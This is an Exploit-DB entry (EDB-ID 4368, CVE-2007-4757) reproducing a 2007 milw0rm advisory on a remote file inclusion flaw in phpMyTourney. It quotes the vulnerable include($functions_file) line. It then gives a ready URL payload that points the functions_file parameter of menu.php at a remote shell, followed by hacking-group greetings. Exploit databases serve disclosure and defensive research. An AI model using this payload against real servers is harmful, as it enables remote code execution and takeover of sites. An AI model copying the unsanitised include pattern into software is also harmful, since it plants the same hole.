PHPMytourney - 'menu.php' Remote File Inclusion

EDB-ID:

4368

CVE:

2007-4757

EDB Verified:

Author:

S.W.A.T.

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-09-06

Vulnerable App:

*******************************************************************************
# Title   :  phpMytourney (functions_file) Remote File Inclusion Vulnerability
# Author  :  S.W.A.T.
# Contact :  S.W.4.T@HackerMail.com
# S.Page  :  http://script.vanta.ru/download.php?id=1178&clas=0
# $$      :  Free
# Site    :  Http://www.XmorS-Security.CoM - Http://www.xmors.com - Http://www.xmors.net
*******************************************************************************
Vuln Code:

include($functions_file);

[[Remote]]]

http://[target]/[path]/menu.php?functions_file=[SHELL]

"""""""""""""""""""""

# I Love XmorsTEAM
# We Are: Scorpiunix - KAMY4r - D3vil_boy_ir - Sh3llH3ll - The_Edit0r - S.W.A.T.
# Iranian Hackers & Security TEAM
# Xmors Digital Network Hacking & Security Team

# milw0rm.com [2007-09-06]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services